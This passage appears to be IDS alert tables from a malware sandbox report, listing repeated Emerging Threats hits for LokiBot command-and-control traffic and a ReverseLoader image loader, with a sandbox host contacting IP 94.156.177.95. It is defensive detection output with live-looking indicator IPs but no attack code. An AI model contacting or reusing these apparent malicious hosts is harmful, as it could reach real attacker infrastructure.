2024-11-15T18:14:41.385022+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:42.507084+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:43.612001+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:44.789085+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:47.376347+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:48.529208+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:49.701579+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:50.823890+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:51.959024+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:53.063828+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:54.208036+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:55.402259+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:56.541320+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:57.675629+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:59.316568+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:15:00.437229+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:01.556689+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:02.676612+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:03.787032+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:04.910372+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:06.064903+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:07.206218+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:08.362963+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:09.478766+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:10.588289+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:11.699501+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:12.850507+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:13.986959+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:15.095886+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:16.190598+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:17.330232+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:18.444210+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:19.618198+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:20.778565+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:22.095646+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:23.204415+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:24.317698+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:26.042078+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:27.521568+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:28.641531+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:29.755022+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:30.895119+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:32.048760+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:33.168332+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:34.322493+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:35.461033+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:36.584405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:37.681743+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:38.775422+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:39.883593+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:40.978031+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:42.128775+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:43.271865+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:44.406130+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:45.498060+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:46.635568+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:47.899602+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:49.008238+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:50.170092+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:52.304139+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:53.784154+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:54.916540+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:56.055649+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:57.189916+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:58.301640+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:59.440010+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:16:00.576896+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:01.676781+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:02.815850+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:04.169499+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:05.363656+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:06.517735+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.95	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:34.615993+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:35.751845+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:36.861902+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:37.995017+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:39.112509+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:40.262543+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:41.385022+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:42.507084+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:43.612001+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:44.789085+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:47.376347+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:48.529208+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:49.701579+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:50.823890+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:51.959024+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:53.063828+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:54.208036+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:55.402259+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:56.541320+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:57.675629+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:59.316568+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:15:00.437229+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:01.556689+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:02.676612+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:03.787032+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:04.910372+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:06.064903+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:07.206218+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:08.362963+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:09.478766+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:10.588289+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:11.699501+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:12.850507+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:13.986959+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:15.095886+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:16.190598+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:17.330232+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:18.444210+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:19.618198+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:20.778565+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:22.095646+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:23.204415+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:24.317698+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:26.042078+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:27.521568+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:28.641531+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:29.755022+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:30.895119+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:32.048760+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:33.168332+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:34.322493+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:35.461033+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:36.584405+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:37.681743+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:38.775422+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:39.883593+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:40.978031+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:42.128775+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:43.271865+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:44.406130+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:45.498060+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:46.635568+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:47.899602+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:49.008238+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:50.170092+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:52.304139+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:53.784154+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:54.916540+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:56.055649+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:57.189916+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:58.301640+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:59.440010+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:16:00.576896+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:01.676781+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:02.815850+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:04.169499+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:05.363656+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:06.517735+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.95	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:31.426231+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:32.580658+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:33.648797+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:34.779935+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:35.927180+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:37.042044+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:38.155116+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:39.310499+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:40.418721+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:41.540423+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:42.666273+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:43.780827+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:44.948157+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:47.565744+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:48.732748+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:49.866643+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:51.015684+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:52.116189+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:53.231994+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:54.415833+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:55.567481+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:56.697888+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:57.888076+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:59.477956+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:00.622720+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:01.716470+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:02.843351+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:03.944044+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:05.079130+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:06.232263+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:07.371818+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:08.527825+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:09.646081+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:10.738508+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:11.909051+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:13.033207+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:14.143909+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:15.260992+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:16.354360+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:17.488009+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:18.648637+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:19.770914+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:21.183194+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:22.276771+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:23.386905+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:24.486068+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:26.198172+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:27.680897+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:28.793698+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:29.925408+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:31.052611+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:32.214108+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:33.332376+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:34.479837+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:35.618188+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:36.745165+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:37.835646+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:38.930011+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:40.041826+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:41.133212+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:42.287477+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:43.432085+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:44.558614+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:45.645313+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:46.938497+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:48.053000+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:49.198772+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:51.314217+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:52.472929+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:53.951386+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:55.077914+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:56.206763+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:57.353617+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:58.470891+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:59.601399+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:00.728619+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:01.834858+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:03.165663+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:04.337364+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:05.839274+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50057	94.156.177.95	80	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:16.278435+0100	2049038	1	A Network Trojan was detected	142.215.209.78	443	192.168.2.5	49705	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
